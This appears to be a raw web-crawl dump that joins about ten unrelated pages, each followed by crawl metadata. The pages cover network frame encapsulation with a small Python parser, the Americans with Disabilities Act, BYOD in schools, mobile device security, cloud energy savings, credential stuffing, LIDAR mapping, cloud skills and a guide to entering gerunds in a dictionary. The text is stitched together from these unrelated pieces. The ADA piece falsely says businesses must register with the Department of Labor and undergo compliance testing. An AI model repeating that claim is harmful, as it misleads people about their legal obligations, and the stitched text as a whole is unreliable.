Read the article "Mots de passe et sécurité informatique: restez vigilant" by FRC (in French), and take our interactive quiz.
Maybe your score will surprise you ? | <urn:uuid:a48d7e2a-a487-4553-a849-5834739aad6f> | CC-MAIN-2022-40 | https://navixia.com/en/article/permis-informatique-avec-la-frc-10 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00118.warc.gz | en | 0.888988 | 184 | 2.609375 | 3 |
Illustration of packets and frames
This figure shows an example of an IP packet with the naming conventions used for the different parts of the packet and the frame.
The figure in Illustration of packets and frames also shows where the various encapsulation fields are located:
- ISL encapsulation of a MAC frame is done by inserting an ISL header in front of the MAC header and an ISL CRC after the MAC CRC.
- VLAN tags can be inserted inside the MAC header by using a 0x8100 or 0x88A8 length/type value. The last VLAN tag holds the protocol type of the packet.
- MPLS labels can be inserted after the MAC header (or after the last VLAN tag) by using a 0x8847 or 0x8848 length/type value. If a frame is MPLS-encapsulated, the packet is assumed to be an IP packet.
Note: In this document inner layers, inner fragments, inner packets, inner hash keys and so on refer to the first tunnel discovered. Deeper tunnels are not decoded. | <urn:uuid:98967e52-574f-4d2a-8a88-42c5e151a5dd> | CC-MAIN-2022-40 | https://docs.napatech.com/r/Feature-Set-N-ANL9/Packets-and-Frames | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.797509 | 236 | 3.125 | 3 |
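A rough Python sketch of the parsing logic implied by these encapsulation rules is shown below: read the EtherType after the MAC header, pop any 0x8100/0x88A8 VLAN tags, and treat 0x8847/0x8848 as MPLS (assumed here to carry IP). ISL handling and deeper tunnels are omitted, and the example frame bytes are made up.

    import struct

    def classify_frame(frame: bytes):
        """Very small sketch: find the innermost EtherType after VLAN tags."""
        ethertype = struct.unpack("!H", frame[12:14])[0]   # after dst/src MAC
        offset = 14
        vlan_tags = 0
        while ethertype in (0x8100, 0x88A8):               # VLAN / provider tag
            ethertype = struct.unpack("!H", frame[offset + 2:offset + 4])[0]
            offset += 4
            vlan_tags += 1
        if ethertype in (0x8847, 0x8848):                  # MPLS: assume IP inside
            return f"MPLS-encapsulated packet after {vlan_tags} VLAN tag(s)"
        if ethertype == 0x0800:
            return f"IPv4 packet after {vlan_tags} VLAN tag(s)"
        return f"EtherType 0x{ethertype:04x} after {vlan_tags} VLAN tag(s)"

    # Example: header of an untagged IPv4 frame (addresses zeroed, payload omitted)
    header = bytes(12) + struct.pack("!H", 0x0800)
    print(classify_frame(header))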
The Americans with Disabilities Act (ADA) is a federal law that U.S. Congress enacted and signed into law in July of 1990 and has since expanded. The Act protects individuals with disabilities who work and seek employment within the United States.
The Act’s purpose is to ensure that companies provide ALL employees with reasonable accommodations to perform their jobs. For instance, companies may require at least one translator (or interpreter) to translate English into Sign Language and vice versa. An interpreter is especially critical in specific fields such as engineering or medicine because of the specialized nature of the information involved. If an employee or client cannot comprehend communications, they will have a hard time understanding crucial information in the workplace. These misunderstandings can mean someone’s life in medical settings and someone’s future on legal grounds.
The ADA ensures that individuals with disabilities are given the same opportunity for employment as other individuals. Any individual with a disability who experiences discrimination can use the ADA law for protection in court.
What are some of the steps that a business owner can take to ensure that they comply with the ADA? Business organizations must register with the Department of Labor. Once they become registered, they are required to undergo many tests and monitoring procedures to ensure compliance. Managers and employees should also begin by undergoing cultural competency training and awareness presentations. | <urn:uuid:8336e263-3d55-46d7-8169-f4899a8a59cf> | CC-MAIN-2022-40 | https://www.drware.com/why-business-owners-should-know-about-the-americans-with-disabilities-act/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.953151 | 271 | 3.59375 | 4 |
For those born prior to the year 2000, the rapid acceleration of technological adoption is almost unbelievable. But for those who never really experienced the pre-digital age, the shift toward tech-centric everything is business as usual. Today’s children and teenagers have never had to complete some of the most basic functions without the Internet or mobile devices, and yet school administrators expect them to learn and thrive in an academic environment that has hardly changed in the last 30 years.
Because the needs of students are quickly moving toward more digital curriculum, the role of technology in the classroom is rapidly evolving. While funding for technology in schools reached about $800 million in the early 2000s, this year that number has jumped to almost $12 billion. School administrators and teachers alike are beginning to realize that teaching students in media they already feel comfortable with is a much easier task than trying to make kids embrace outdated methods.
According to research conducted by education software company Sungard, the most popular digital technology to use in the classroom is a laptop, with 71 percent of kids ages 8 to 18 reporting having used such a device for school work. Half of those surveyed also used their smartphones for classwork and 44 percent used tablets. Of the students who used tablets in class, 52 percent had their own devices to work with and another 28 percent shared the device with family members. Only 20 percent reported using tablets provided by the school.
Bring-your-own-device programs are already quite popular in the business world and are now making their way into schools. Just as teachers are bringing technology into the classroom because their students access information online and through apps, allowing kids to bring their own devices enables them to learn and explore on a machine they already feel comfortable with. While the logic behind school BYOD initiatives may be sound, it can be difficult to implement such programs effectively. Continue reading for four tips to make deploying classroom BYOD go more smoothly.
1) Ensure reliable bandwidth is available
One of the most obvious requirements for school BYOD is also one of the most frequently overlooked. Deploying BYOD will have a dramatic impact on schools’ bandwidth, and IT administrators need to be prepared for the spike in demand.
2) Create guidelines for appropriate use of devices
While technology has proven to be beneficial in educational environments, it also creates temptation for students to get off task. Explaining to the class what constitutes appropriate behavior while using devices before they are introduced can help cut down on unwanted distractions.
3) Create lesson plans with BYOD in mind
When introducing a new medium into the curriculum, it doesn’t always work to use the same lesson plan created for a different outlet. Planning lessons that have been specifically designed for the devices that are going to be used gets the most out of the technology. Creating a list of websites and applications that are particularly beneficial for certain subjects is a great resource and will help keep students engaged and focused.
4) Well balanced learning is essential
As beneficial as the Internet and digital technology can be for children as they learn, time away from screens is also important. Creating an equal balance of on- and off-screen learning allows for an ideal mix of stimulation.
By taking these suggestions to heart, teachers and school administrators can greatly improve the learning experiences of their students. However, the advantages schools receive by implementing technology are worth nothing if the devices and programs aren’t managed effective and kept safe from cyber threats.
Faronics Insight classroom management software offers schools a program through which they can establish device settings, access software upgrades and maintain control over what students are looking at with their devices during lessons. Security updates can be scheduled to download automatically in order to protect against any unknown bugs or vulnerabilities and student work can be shared safely through a private online portal. Technology is becoming an increasingly vital part of education, so help keep IT investments secure with Faronics. | <urn:uuid:50f45038-a7ac-4318-89ed-16ca8b9905ee> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/4-ways-to-employ-byod-successfully-in-schools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.964313 | 785 | 3.15625 | 3 |
Keeping your mobile device free of malware is an important side of securing your data and privacy. The other side is what can be done to secure the device if it falls into the wrong hands.
For our 100 days of security, we’ll share tips on securing your device.
Remote Wipe
Having the ability to remotely wipe your device if it is lost or stolen is great for these worst-case scenarios.
Smartphone thefts have increased multiple times over in the last couple of years, to the point where some states are looking to require carriers to offer kill switches that will disable the phone.
Android and iOS devices come with native lost-device protection; we suggest setting this up, or you can find some pretty good options in your favorite app store.
An important complement to the remote wipe is taking the time to back up your device: images, contacts and important data.
Mobile operating systems do come with backup software like iCloud or Google Backup.
Lost or stolen devices significantly increase your risk of identity theft. Enabling built-in locking features such as PIN codes and passwords is a great first line of defense to keep unwanted access to the device blocked.
Using safe practices when accessing free WiFi hotspots can keep your data secure. We suggest not logging into any secure websites while connected to a free hotspot.
Having your data encrypted is an additional layer of protection if your device falls into the wrong hands.
The latest versions of iOS and Android now have encryption enabled out of the box, but if you're still running one of the older versions you could still enable some form of encryption for your data. There are also third-party encryption apps available in the app stores.
Taking these additional steps to secure your mobile computing might be inconvenient at first, but taking a proactive approach to security will benefit you in the long run--even if it's just peace of mind.
Cloud computing adopters may find an unanticipated edge when moving to this IT model: the ability to trim energy consumption.
Cloud proponents often cite the ability to rapidly scale resources as the initial driver behind cloud migration. This elasticity lets organizations dial up — and dial down — compute power, storage and apps to match changes in demand.
The resulting efficiency boost cuts cost and makes for a solid business case. But the cloud also has a green side: The technology, when deployed with care, can reduce your power usage and carbon footprint.
The linchpin cloud technologies — virtualization and multi-tenancy — support this dual role. Virtualization software lets organizations shrink the server population, letting IT departments run multiple applications — packaged as virtual machines — on a single physical server. Storage arrays can also be consolidated and virtualized. This process creates resource pools that serve numerous customers in a multi-tenant model.
Enterprises that recast their traditional data centers along cloud lines, creating so-called private clouds, have an opportunity to move toward energy conservation. A number of metrics have emerged to help chart that course. Power usage effectiveness (PUE), SPECpower, and utilization in general are among the measures that can help organizations track their progress.
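As a simple illustration of two of these metrics, the Python snippet below computes PUE (total facility energy divided by IT equipment energy) and an average utilization figure from made-up numbers.

    # PUE and utilization from example figures (all numbers invented).
    total_facility_kwh = 180_000      # power, cooling, lighting plus IT load
    it_equipment_kwh = 100_000        # servers, storage, network gear

    pue = total_facility_kwh / it_equipment_kwh
    print(f"PUE: {pue:.2f} (1.0 would mean every watt goes to IT gear)")

    cpu_hours_used = 6_400
    cpu_hours_available = 16_000
    print(f"Average utilization: {cpu_hours_used / cpu_hours_available:.0%}")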
IT managers, however, must remain watchful to root out inefficient hardware and data center practices as they pursue the cloud’s energy savings potential.
Working in Tandem
EMC Corp. has found that streamlined IT and energy savings work in tandem in its private cloud deployment. The company embarked on a consolidation and virtualization push as its IT infrastructure began to age.
Jon Peirce, vice president of EMC private cloud infrastructure and services, describes the company’s cloud as “a highly consolidated, standardized, virtualized infrastructure that is multi-tenant within the confines of our firewall.”
EMC hosts multiple applications within the same standardized, multi-tenant infrastructure, he added.
As for energy efficiency, virtualized storage has produced the greatest impact thus far. EMC, prior to the cloud shift, operated 168 separate storage infrastructure stacks across five data centers. In that setting, capacity planning became nearly impossible. The company started buffering extra capacity, which led to device utilization of less than 50 percent, explained Peirce.
Poor utilization wasn’t the only issue. EMC found storage to consume more electricity per floor tile than servers in its data centers.
“The first thing we did in our journey toward cloud computing was to take the storage component and collapse it to the smallest number we thought possible,” says Peirce.
EMC reduced 168 infrastructure stacks to 13, driving utilization up to about 70 percent in the process. Consolidation reduced the overall storage footprint, which now grows at a slower rate going forward since the company doesn’t have to buffer as much.
Storage tiering also contributed to energy reduction. In tiering, application data gets assigned to the most cost-effective — and energy-efficient — storage platform. EMC was able to re-platform many applications from tier-one Fibre Channel disk drives to SATA drives, higher-capacity devices that consume less electricity per gigabyte.
“That let us accommodate more data per kilowatt hour of electricity consumed,” says Peirce.
Moving data to energy-efficient drives contributed to the greening of EMC’s IT.
Together, tiering and consolidation cut EMC’s data center power requirement by 34 percent, leading to a projected 90-million-pound reduction in carbon footprint over five years, according to an Enterprise Strategy Group audit.
Getting the Most From the Cloud
John Stanley, research analyst for data center technologies and eco-efficient IT at market researcher The 451 Group, said energy efficiency may be divided into two categories: steps organizations can take on the IT side, and steps they can take on the facilities side.
On the IT side, the biggest thing a data center or private cloud operator can do to save energy is get as much work out of each hardware device as possible, says Stanley. Even an idle server may consume 100 to 250 watts, so it makes sense to have it doing something, he notes.
Taking care of the IT angle can save energy on the facilities side. Stanley says an organization able to consolidate its workload on half as many servers will spit out half as much heat. Less heat translates into lower air-conditioning requirements.
“When you save energy in IT, you end up saving energy in the facilities side as well,” says Stanley.
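To put rough numbers on that reasoning, here is a back-of-the-envelope sketch; the server count, wattage, cooling overhead and electricity price are illustrative assumptions, not figures from the article.

```python
# Rough estimate of the energy avoided by retiring lightly used servers.
# All inputs are illustrative assumptions, not measured values.
servers_retired = 50         # physical servers removed after consolidation
idle_draw_watts = 175        # mid-range of the 100-250 W idle draw cited above
hours_per_year = 24 * 365
cooling_overhead = 0.5       # assumed extra facility watts per watt of IT load
price_per_kwh = 0.12         # assumed electricity price in USD

it_kwh = servers_retired * idle_draw_watts * hours_per_year / 1000
facility_kwh = it_kwh * (1 + cooling_overhead)   # IT load plus the cooling it no longer needs

print(f"IT energy avoided:       {it_kwh:,.0f} kWh/year")
print(f"Facility energy avoided: {facility_kwh:,.0f} kWh/year")
print(f"Rough cost avoided:      ${facility_kwh * price_per_kwh:,.0f}/year")
```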
But the cloud doesn’t cut energy costs completely on its own. IT managers need to make a conscious effort to realize the cloud’s energy-savings potential, cautions Stanley. He says they should ask themselves whether they are committed to doing more work with fewer servers. They should also question their hardware decisions. An organization consolidating on aging hardware may need to choose more energy-efficient servers in the next hardware refresh cycle, he adds.
In that vein, developments in server technology offer energy-savings possibilities. Today’s Intel Xeon Processor-based servers, for instance, include the ability to “set power consumption and trade off the power consumption level against performance,” according to an Intel article on power management.
This class of servers lets IT managers collect historical power consumption data via standard APIs. This information makes it possible to optimize the loading of power-limited racks, the article notes.
Enterprises determined to wring more power efficiency out of their clouds have a few metrics available to assess their efforts.
Power usage effectiveness, or PUE, is one such metric. The Green Grid, a consortium that pursues resource efficiency in data centers, created PUE to measure how data centers use energy. PUE is calculated by dividing total facility energy use by the amount of power consumed to run IT equipment. The metric aims to provide insight into how much energy is expended on overhead activities, such as cooling.
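As a concrete illustration of the metric, the short snippet below computes PUE from two meter readings; the numbers are invented for the example.

```python
def pue(total_facility_kw: float, it_equipment_kw: float) -> float:
    """Power usage effectiveness: total facility power divided by IT equipment power."""
    return total_facility_kw / it_equipment_kw

# Illustrative readings: the facility draws 1,800 kW in total,
# of which 1,200 kW reaches servers, storage and network gear.
print(pue(1800, 1200))   # 1.5, i.e. 0.5 W of cooling and power-distribution overhead per watt of IT load
```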
Roger Tipley, vice president at The Green Grid, said PUE is a good metric for facilities engineers who need to size a data center’s infrastructure appropriately for the IT equipment installed. PUE may be coupled with the PUE Scalability Metric, a tool for assessing how a data center’s infrastructure copes with changes in IT power loads.
Peirce said EMC tracks PUE fairly closely and designed a recently opened data center to deliver a very aggressive PUE number. The lowest possible PUE value is 1.0, which represents 100-percent efficiency: every watt delivered to the facility reaches the IT equipment. While PUE looks at energy from a facility-wide perspective, data center operators also focus more specifically on hardware utilization. Peirce said utilization is the main metric EMC uses, employing that measure to gauge both cost and energy efficiency.
Stanley says utilization measures can get a bit complicated. A CPU may experience very high utilization, but have no essential business tasks assigned to it.
“Utilization is not necessarily always the same thing as useful work,” he says.
Other hardware-centric metrics include SPECpower_ssj2008 and PAR4. Standard Performance Evaluation Corp.’s SPECpower assesses the “power and performance characteristics of volume server class computers,” according to the company. PAR4, developed by Underwriters Laboratories and Power Assure, is used to measure the power usage of IT equipment.
The various measures can guide enterprises toward energy savings, but making the efficiency grade requires a concerted effort.
“Yes, you can save energy by switching to a private cloud,” says Stanley. “But just saying ‘We are going to switch’ is not enough.” | <urn:uuid:dfd57228-7e6b-4848-a05f-1464348e81be> | CC-MAIN-2022-40 | https://intelligenceinsoftware.com/EnergySavingsintheCloud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00118.warc.gz | en | 0.933478 | 1,609 | 2.546875 | 3 |
What is the hacking technique known as ‘Credential Stuffing’?
Hackers used data stolen from less secure sources to access HSBC customers’ bank accounts. Does this mean all our online profiles now need the same level of security as our online banking credentials? How can consumers really know which websites and connections are secure?
Tim Callan, Senior Fellow at Sectigo:
“Credential stuffing” attacks are an example of how broadly information theft can be exploited by sophisticated criminals. Even seemingly innocuous personal details, stolen in a context that appears to be completely devoid of risk for critical information theft, can then be repurposed to gain inappropriate login access somewhere else.
“Consumers should only share information with online parties they know and trust. One of the ways they can be sure of the identity of a web site operator is to look for the company’s name in the browser’s address bar adjacent to the URL. When it appears in the browser this way, you can trust that this information has been authenticated and you’re seeing the actual name of the company that operates this site.” | <urn:uuid:dbbe688e-dd2f-4e5b-99ab-8ca14ec7c621> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/hsbc-data-breach-and-credential-stuffing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00118.warc.gz | en | 0.933115 | 234 | 3.203125 | 3 |
LIDAR's remote sensing technology, which bounces pulsed lasers, produces more accurate maps more quickly than traditional geospatial tools.
Light detection and ranging technology, which has proved invaluable to a variety of domestic mapping projects, is also a potential game-changer in Afghanistan, where troops face some of the world’s most forbidding terrain.
Troop movements are hair-raising, with improvised explosive device attacks so ferocious that broad agency announcements go out for unmanned ground vehicles. Helicopter gunship crews remain vulnerable to shoulder-launched rockets and anti-aircraft fire. Yet until recently, coalition commanders have often relied on dusty Raj-era British terrain maps.
But LIDAR, an optical remote sensing technology, can yield data flows that are orders-of-magnitude quicker, more accurate and clearer than other mapping tools.
LIDAR bounces pulsed lasers, as opposed to the electromagnetic radio waves of radar and sonar, off target objects and surrounding areas of interest to detect their properties. Because it can detect much smaller particles in the atmosphere than radar, which can’t detect things smaller than cloud particles, LIDAR can even be used for aerosol detection.
Some laser radar systems can perform multiple sequential scans over a scene. Others create images in target or mapping modes. In targeting, the sensor continually focuses, saturating a target with laser pulses to generate a high-resolution product. Mapping is wide-area collection, where the laser pans to collect data along a set path.
The National Geospatial-Intelligence Agency (NGA) has been deploying LIDAR in aircraft to map Afghanistan’s entire 647,500 square kilometers. In announcing the ALIRT LIDAR project at the GEOINT 2010 Symposium, Air Force Lt. Gen. John Koziol, director of the Defense Department’s Intelligence, Surveillance and Reconnaissance (ISR) Task Force, heralded the technology’s “amazing capacities” for coverage down to inch-level fidelity.
At that time, a sole Air Force G-3 Gulfstream was involved in NGA's Afghanistan mapping operation, Koziol said. The total number of aircraft ultimately deployed — and nearly the entire program — is classified. But NGA describes its ALIRT LIDAR program as “an airborne 3-D imaging laser radar system optimized for wide-area terrain mapping.” LIDAR mapping was used in the aftermath of Haiti's 2010 earthquake.
In public testimony in March, Defense Advanced Research Projects Agency Director Regina Dugan called LIDAR’s photon-detecting arrays “so sensitive it’s now possible to make range measurements with fewer than 10 photons received, versus tens of thousands,” which means that at times, the technology is capable of locating hidden objects and penetrating tree canopies.
LIDAR can complement, interface with or fuse with conventional maps, tactical computer modeling, full-motion video, hyperspectral imagery and ISR platforms. The Global Positioning System enables the process.
Mathias Kolsch, assistant professor of computer science at the Naval Postgraduate School, helps direct the DOD-backed ISR Task Force at the school’s Remote Sensing Center. Often in consultation with National Security Agency colleagues, he works on LIDAR issues such as anomaly-detection and semantic compression algorithms, computer-vision analysis, and multimedia.
The depth calculation capability of the Afghanistan-mapping technology is a prime attraction for the deployed force, Kolsch said. Mission tasking determines the lasers’ widths and other parameters, but the detection range is from a few centimeters to a meter.
“The most advanced LIDAR sensors for critical depth measurements are called Flash LIDAR, and they do more or less what a flashlight does: send out a big broad pulse of laser light…[with] multiple receivers” for the returns, he said. “Instead of the traditional LIDAR with its single receptor, [these sensors] have a whole detection array — banks of digital [charge-coupled device] cameras — so they simultaneously get multiple depths.”
Current-generation LIDAR can be configured to cover specific structures, vehicles, roadways or terrain. The light it pulses from an aircraft’s sensor can, by some estimates, collect as many as 150,000 data points per second. The data provides location on an X-Y-Z axis, referred to as a point cloud, with millions of individual ground data points.
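To make the point-cloud idea concrete, here is a minimal sketch of how scattered X-Y-Z returns can be gridded into a simple elevation model; the coordinates are randomly generated stand-ins, not real sensor output.

```python
import numpy as np

# Each LIDAR return is an (x, y, z) point; a real flight line produces millions of them.
rng = np.random.default_rng(0)
points = np.column_stack([
    rng.uniform(0, 100, 10_000),   # x, metres
    rng.uniform(0, 100, 10_000),   # y, metres
    rng.normal(50, 2, 10_000),     # z, metres (synthetic terrain heights)
])

cell = 5.0                         # grid resolution in metres
nx = ny = int(100 / cell)
dem = np.full((ny, nx), np.nan)    # digital elevation model, one height per cell

cols = (points[:, 0] // cell).astype(int).clip(0, nx - 1)
rows = (points[:, 1] // cell).astype(int).clip(0, ny - 1)
for r, c, z in zip(rows, cols, points[:, 2]):
    # Keep the highest return in each cell, a crude "first surface" model.
    if np.isnan(dem[r, c]) or z > dem[r, c]:
        dem[r, c] = z

print(dem.shape, float(np.nanmin(dem)), float(np.nanmax(dem)))
```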
According to the Naval Postgraduate School, wavelengths range from ultraviolet to visible and infrared, which is at least 1,000 times smaller than radar. By comparison, Canada’s Radarsat satellite has a wavelength of 5.6 cm. Here, smaller is better.
What’s more, satellites are typically a few meters off, Kolsch said. But “with LIDAR-based approaches, you can identify little pebbles on a road — and what’s around them.” Besides discovering military conditions and elevations from 3-D models, the data can be used for detecting change over time to determine whether new buildings have been constructed or roads regraded.
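Change detection over time then amounts to differencing two such elevation models collected on different dates; a sketch, assuming two DEM arrays like the one built above.

```python
import numpy as np

def changed_cells(dem_before: np.ndarray, dem_after: np.ndarray, threshold_m: float = 2.0) -> np.ndarray:
    """Boolean mask of cells whose elevation changed by more than threshold_m,
    e.g. a new building appearing or a road being regraded."""
    diff = np.abs(dem_after - dem_before)
    return np.nan_to_num(diff) > threshold_m
```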
Other mapping modalities being deployed or in late-stage development include the DARPA/Air Force Research Lab’s High Altitude LIDAR Operations Experiment, the Army’s holographic Tactical Battlefield Visualization program, and the Army Geospatial Center’s terrain-charting BuckEye tool, which melds airborne LIDAR with digital color camera imagery.
An NGA imagery scientist, who asked to remain anonymous for security reasons, said that depending on the mission, LIDAR sensors are “bathymetric, topographic and atmospheric…and gather topographic data using different regions of the spectrum.” The resulting data is used to automatically generate high-resolution 3-D digital terrain and elevation models. Overall, the scientist said, LIDAR elevation data supports improved battlefield visualization, line-of-sight analysis and urban warfare planning.
Some research focuses on using LIDAR to perform fully automated feature extractions, 3-D urban modeling and vertical obstruction analysis, the scientist said. LIDAR might eventually perform semi-automated feature extraction and display — for example, for vegetation, buildings and roads. | <urn:uuid:001b628e-160b-4a42-bede-679329085a0f> | CC-MAIN-2022-40 | https://gcn.com/data-analytics/2011/07/laser-based-mapping-tech-a-boost-for-troops-in-afghanistan/283442/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00118.warc.gz | en | 0.908903 | 1,350 | 3.0625 | 3 |
Top Cloud Skills Employers Look For
Cloud computing refers to the delivery of computing services over a proprietary network or the Internet. Those services mainly include infrastructure (i.e. servers, storage devices, etc.), development platforms, and software applications. The Cloud refers to the many data centers located throughout the world that house the hardware necessary to offer cloud services. The recent proliferation of virtualization technology, on which cloud computing is based, has contributed to its current popularity.
Cloud computing services fall into three categories, Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS), and Software-as-a-Service (SaaS).
- An IaaS provider satisfies its customers’ needs for computing resources by supplying servers (both physical computers and virtual machines), block storage, networking components and other hardware like firewalls and load balancers. All of these resources across the data center are pooled to provide on-demand access. The service provider may also provide the operating system and some applications with which users build their own customized software images. Ultimately, though, the provider is responsible for the equipment and the customer is responsible for the applications running on the equipment.
- A PaaS provider supplies an environment in which software developers can build and deliver web-based applications and services over the Internet. Once the application is built, it runs on the provider’s servers and is delivered to the users via the Internet. Again, the exact services provided will vary by vendor but all will include tools for design, development, testing, deployment, and hosting. Other support services like developer collaboration and community forums, security, storage, application versioning and more are also likely to be included. Like IaaS, the cost of PaaS is determined by actual usage.
- A SaaS provider hosts software applications and the data stored therein. No part of the software resides on the user’s computer. Rather, users access the software over the Internet and typically pay for it with a subscription. The subscription replaces the need for licenses. The costs of SaaS are minimal considering the amount of functionality and computing resources you get compared to the cost of buying your own software and equipment.
Here are the Top Cloud Skills
- Cloud security: Security was once the main challenge for many companies, but most firms today understand that security can be properly handled in a cloud implementation. New tools such as data loss prevention (DLP) and identity access and management (IAM) are part of a cloud security solution, and IT pros should also help build best practices around process such as procurement and integration.
- Virtualization: Virtual machines have been part of the IT landscape for quite some time but today they are ranked very highly for demand. The fact that virtualization skills are still in demand speaks to the amount of modernization that many companies still need to perform in moving from a static on-premises mindset to a dynamic as-a-service approach.
- Business Continuity/Disaster Recovery (BC/DR): Obviously a top-of-mind topic following the COVID-19 outbreak, BC/DR is a perfect example of a broad process rather than a discrete skill. By understanding the various options available in cloud storage and cloud software, IT pros can build a solid BC/DR plan that helps their organization navigate disruptions.
- Optimization: One of the main benefits of cloud computing is the ability to tailor the infrastructure depending on the application. This is something that not many companies have performed in the past—especially if they have not been exploring virtualization—and it requires IT pros to understand the behavior of applications along with the different characteristics of cloud infrastructure options and cloud providers.
- Private cloud construction: The label “private cloud” is often applied to a wide variety of situations, including any managed infrastructure or even a company’s existing on-prem equipment. As businesses recognize the differences between different models, they may opt to build a true private cloud, requiring the use of software to dynamically allocate resources and self-monitor based on certain parameters.
- Orchestration: A natural result of optimization is a multi-cloud environment, where many different providers and models are utilized in order to achieve the best performance. In this situation, there is a need to ensure all the pieces are working together properly. This is similar to standard data center management, but on a much larger scale.
- Data analysis: Cloud computing affects data analysis in two ways. First, there is an abundance of information generated from cloud operations that must be analyzed for proper orchestration. Second, cloud components offer a pathway for companies to perform more robust data analysis than they ever have in the past.
Most of these skills can apply to IT pros in multiple disciplines. For example, virtualization is obviously a skill needed for infrastructure management, but it is also important for software developers as they work in DevOps environments. Regardless of the career path, being competent with cloud systems will be a must for the years to come. | <urn:uuid:3581f096-2682-4412-a3a9-7b444430cfff> | CC-MAIN-2022-40 | https://intellectualpoint.com/top-cloud-skills-employers-look-for/?highlight=Cloud+Computing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00118.warc.gz | en | 0.939181 | 1,026 | 2.75 | 3 |
The UK government has highlighted 38 UK run quantum projects that will receive a share of a £70 million investment that aims to develop technologies ranging from new electric vehicle batteries to advanced imaging systems that detect cancer.
Quantum technologies could potentially bring about technological breakthroughs in the field of cryptography, as quantum computers are expected to be exponentially faster than the HPC systems operating today.
This round of investment will go to 80 companies and 30 universities that are working on the 38 quantum projects. Enterprises and universities are collaborating on many of the projects; for example, the University of Manchester is working with the medical imaging firm Adaptix to develop a sensor that can differentiate between cancerous and healthy tissue.
UK Research and Innovation Challenge Director Roger McKinlay commented that: “About one third of the projects concern quantum computing, demonstrating that the UK is becoming the go-to place for this game changing technology, with a growing community of thriving spin-outs, led by world-class teams. Quantum computers will be exponentially faster than classical computers at certain kinds of complex problems, solving in seconds what would take the best classical computers thousands of years.”
Larger Quantum Investment
Last year the UK government committed £153 million towards the development of quantum technologies, bringing total investment into the nascent technology to £1 billion. This week’s allocation of funding to the 38 projects is part of that larger investment.
Through the National Quantum Technologies Programme the £153 million is expected to be matched with a £200 million investment from the private sector. Overall the UK government hopes to ‘increase research and development investment to 2.4% of GDP.”
The UK is also establishing a National Quantum Computing Centre; this centre will be delivered by the UK Research and Innovation body, which works in collaboration with industry and universities.
At the time of the investment Science Minister Chris Skidmore commented that: “This milestone shows that Quantum is no longer an experimental science for the UK. Investment by government and businesses is paying off, as we become one of the world’s leading nations for quantum science and technologies. Now industry is turning what was once a futuristic pipedream into life-changing products. This is our modern Industrial Strategy in action – taking the most innovative ideas from our world-leading researchers and showing how they can be applied, from diagnosing diseases to detecting gas leaks.” | <urn:uuid:fd8488bd-250d-4e04-9414-2b4381c56346> | CC-MAIN-2022-40 | https://techmonitor.ai/technology/hardware/quantum-investment | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00118.warc.gz | en | 0.947175 | 478 | 2.5625 | 3 |
When do Gerunds get their own lemma, and when do they get placed under their base lemma?
| | Enter as own lemma | Place under base lemma |
| --- | --- | --- |
| Single words | Gerund has a noun definition of "The act of a". | Gerund does not have a noun definition "The act of a". |
| Multi-word phrases | Base lemma is not a verb. | Base lemma is a verb. |
A gerund is a form that is derived from a verb that functions as a noun. Gerunds are always formed from the present participle form of a verb therefore will always end in –ing.
A lemma is a word or phrase that is glossed; headword.
Gerunds that have a noun definition of “The act of a”, get their own lemma. For example: logging, booking, climbing, etc.
Gerunds that do not have such noun definitions get placed under their base verb form lemma. For example: testing gets placed under test, asking gets placed under ask, etc.
When dealing with multi-word phrases that end in gerunds, we must look at the term as a whole; if we replace the gerund in a phrase with its base verb form, is it still a valid phrase and is the phrase a verb?
If the multi-word base verb phrase is a verb, the multi-word gerund phrase should be placed under its base verb form lemma.
If the multi-word base verb phrase is not a verb, the multi-word gerund phrase should get its own lemma. The multi-word gerund phrase should then get connected to the multi-word base verb phrase in the UCF Term Hierarchy.
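A minimal sketch of this decision procedure in code; the inputs (whether the gerund has an "act of" noun definition, and whether the base phrase is a verb) are assumed to have already been established from the dictionary sources, as described above.

```python
def gerund_entry(gerund: str, has_act_of_definition: bool, base_phrase_is_verb: bool) -> str:
    """Decide whether a gerund or gerund phrase gets its own lemma."""
    if " " not in gerund:                      # single word
        return "own lemma" if has_act_of_definition else "place under base lemma"
    # Multi-word phrase: consider the phrase with the base verb form substituted in.
    if base_phrase_is_verb:
        return "place under base lemma"
    return "own lemma, linked to the base phrase in the UCF Term Hierarchy"

# Worked example discussed below: "security testing" / "security test"
print(gerund_entry("security testing", has_act_of_definition=False, base_phrase_is_verb=False))
```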
Multi-word phrase gerund: security testing
Multi-word phrase base verb: security test
Let’s apply this line of thinking to the gerund phrase security testing. The base verb form of testing is test. So we must look at the base verb phrase security test. Is security test a real phrase? Meaning is this a phrase that is used by multiple sources? Yes.
Second question, is security test a verb? No.
Conclusion: security testing should get its own lemma and be connected to security test via the UCF Term Hierarchy. | <urn:uuid:cb85d26c-414c-4d5b-8960-f12b4ba41cb3> | CC-MAIN-2022-40 | https://support.commoncontrolshub.com/hc/en-us/articles/115003798303-How-do-I-enter-gerunds-into-the-Dictionary- | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00118.warc.gz | en | 0.912997 | 544 | 2.71875 | 3 |
